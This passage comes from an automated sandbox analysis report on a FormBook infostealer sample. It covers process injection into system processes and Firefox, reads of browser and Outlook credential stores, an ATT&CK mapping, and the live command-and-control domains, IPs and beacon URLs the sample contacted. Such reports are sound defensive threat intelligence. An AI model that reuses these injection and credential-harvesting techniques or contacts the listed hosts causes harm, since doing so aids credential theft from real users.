                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\comp.exeThread register set: target process: 2112Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\comp.exeThread APC queued: target process: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2DB4008Jump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003B87B1 LogonUserW,0_2_003B87B1
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00363B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00363B3A
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003648D7
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003C4C27 mouse_event,0_2_003C4C27
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SpCuEoekPa.exe"Jump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exeProcess created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003B7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_003B7CAF
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003B874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003B874B
                Source: SpCuEoekPa.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: SpCuEoekPa.exe, OGbZSCDMTTWQqW.exe, 00000006.00000000.1602687184.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151908116.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1757710490.0000000000DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: OGbZSCDMTTWQqW.exe, 00000006.00000000.1602687184.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151908116.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1757710490.0000000000DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: OGbZSCDMTTWQqW.exe, 00000006.00000000.1602687184.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151908116.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1757710490.0000000000DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: OGbZSCDMTTWQqW.exe, 00000006.00000000.1602687184.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151908116.0000000001691000.00000002.00000001.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1757710490.0000000000DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0038862B cpuid 0_2_0038862B
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00394E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00394E87
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003A1E06 GetUserNameW,0_2_003A1E06
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00393F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00393F3A
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003649A0
                Source: SpCuEoekPa.exe, 00000000.00000002.1311195776.0000000001726000.00000004.00000020.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1288401290.00000000016BA000.00000004.00000020.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1288602537.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3155508857.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1680899176.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150179402.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150964448.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150708105.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1681689182.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3152822686.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1682428775.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: SpCuEoekPa.exeBinary or memory string: WIN_81
                Source: SpCuEoekPa.exeBinary or memory string: WIN_XP
                Source: SpCuEoekPa.exeBinary or memory string: WIN_XPe
                Source: SpCuEoekPa.exeBinary or memory string: WIN_VISTA
                Source: SpCuEoekPa.exeBinary or memory string: WIN_7
                Source: SpCuEoekPa.exeBinary or memory string: WIN_8
                Source: SpCuEoekPa.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3155508857.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1680899176.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150179402.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150964448.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150708105.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1681689182.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3152822686.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1682428775.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003D6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_003D6283
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003D6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_003D6747
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00397AA1 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,0_2_00397AA1

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets261
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588628 Sample: SpCuEoekPa.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 28 www.sfantulandrei.info 2->28 30 www.infohive.website 2->30 32 9 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 4 other signatures 2->48 10 SpCuEoekPa.exe 2 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->62 64 Writes to foreign memory regions 10->64 66 2 other signatures 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 OGbZSCDMTTWQqW.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 comp.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 OGbZSCDMTTWQqW.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 qqa79.top 38.47.233.21, 49974, 80 COGENT-174US United States 22->34 36 www.sfantulandrei.info 13.248.169.48, 49996, 49997, 49998 AMAZON-02US United States 22->36 38 6 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SpCuEoekPa.exe53%VirustotalBrowse
                SpCuEoekPa.exe71%ReversingLabsWin32.Trojan.AutoitInject
                SpCuEoekPa.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://whois.gandi.net/en/results?search=sunnyz.store0%Avira URL Cloudsafe
                http://www.127358.win/2mep/?WLtH=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdn4oV88xJK42NkH/MJMBzZ1962N0iLw==&W0-=CzJDBfQxOTFPL0%Avira URL Cloudsafe
                http://www.sfantulandrei.info/wvsm/0%Avira URL Cloudsafe
                http://www.sunnyz.store/ead0/100%Avira URL Cloudmalware
                https://www.gandi.net/en/domain0%Avira URL Cloudsafe
                http://www.mffnow.info/0pqe/?WLtH=aJYCdvvPx+uKS5Ogd0A7vBDK6OZ68qCTbFX0p5fCFhilae8HyBK0z8Ue4klxYsqgBES9oGplOKNa3q3+NTywXADjEmAOq6f7maBI/5zBJpNE8z7ORg==&W0-=CzJDBfQxOTFPL0%Avira URL Cloudsafe
                http://www.muasamgiare.click/dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z0+LVyr2ClayYlRRqEL4rpFPwSbvhCg==&W0-=CzJDBfQxOTFPL100%Avira URL Cloudmalware
                http://www.gk88top.top/vjnn/?WLtH=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1FtKgHUps+jxIjoel/WuIa3Au8OorA==&W0-=CzJDBfQxOTFPL100%Avira URL Cloudmalware
                http://www.sfantulandrei.info/wvsm/?W0-=CzJDBfQxOTFPL&WLtH=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rG+uhWVx8heXLgKcp/EaPre6bkVIFA==0%Avira URL Cloudsafe
                http://www.infohive.website/cnve/0%Avira URL Cloudsafe
                http://www.qqa79.top/t67p/?WLtH=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXJ5swGMf6I8KHf6mMNpdMDm5G/Ryzlg==&W0-=CzJDBfQxOTFPL0%Avira URL Cloudsafe
                http://www.gk88top.top/vjnn/100%Avira URL Cloudmalware
                https://www.muasamgiare.click/dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB100%Avira URL Cloudmalware
                http://www.sunnyz.store/ead0/?WLtH=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhs+/iOoUSS+snV9WWhaA8IUFph6/7A==&W0-=CzJDBfQxOTFPL100%Avira URL Cloudmalware
                http://www.mffnow.info/0pqe/0%Avira URL Cloudsafe
                http://www.127358.win/2mep/0%Avira URL Cloudsafe
                http://www.muasamgiare.click/dc08/100%Avira URL Cloudmalware
                http://www.infohive.website/cnve/?WLtH=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVbx8sa0WS/cLCNqs3fCZ4mL4UPzN89Q==&W0-=CzJDBfQxOTFPL0%Avira URL Cloudsafe
                http://www.mffnow.info0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                qqa79.top
                		38.47.233.21
                		truetrue
                  		unknown
                  webredir.vip.gandi.net
                  		217.70.184.50
                  		truefalse
                    		high
                    www.127358.win
                    		206.238.89.119
                    		truefalse
                      		high
                      www.infohive.website
                      		66.29.149.46
                      		truetrue
                        		unknown
                        dns.ladipage.com
                        		13.228.81.39
                        		truefalse
                          		high
                          www.gk88top.top
                          		172.67.137.47
                          		truefalse
                            		high
                            www.mffnow.info
                            		104.21.64.1
                            		truefalse
                              		high
                              www.sfantulandrei.info
                              		13.248.169.48
                              		truetrue
                                		unknown
                                www.muasamgiare.click
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.sunnyz.store
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.qqa79.top
                                    		unknown
                                    		unknownfalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.infohive.website/cnve/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.127358.win/2mep/?WLtH=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdn4oV88xJK42NkH/MJMBzZ1962N0iLw==&W0-=CzJDBfQxOTFPLtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.muasamgiare.click/dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z0+LVyr2ClayYlRRqEL4rpFPwSbvhCg==&W0-=CzJDBfQxOTFPLtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.mffnow.info/0pqe/?WLtH=aJYCdvvPx+uKS5Ogd0A7vBDK6OZ68qCTbFX0p5fCFhilae8HyBK0z8Ue4klxYsqgBES9oGplOKNa3q3+NTywXADjEmAOq6f7maBI/5zBJpNE8z7ORg==&W0-=CzJDBfQxOTFPLtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.sfantulandrei.info/wvsm/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.gk88top.top/vjnn/?WLtH=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1FtKgHUps+jxIjoel/WuIa3Au8OorA==&W0-=CzJDBfQxOTFPLtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.sunnyz.store/ead0/true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.sfantulandrei.info/wvsm/?W0-=CzJDBfQxOTFPL&WLtH=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rG+uhWVx8heXLgKcp/EaPre6bkVIFA==true
                                      • Avira URL Cloud: safe
                                      		unknown
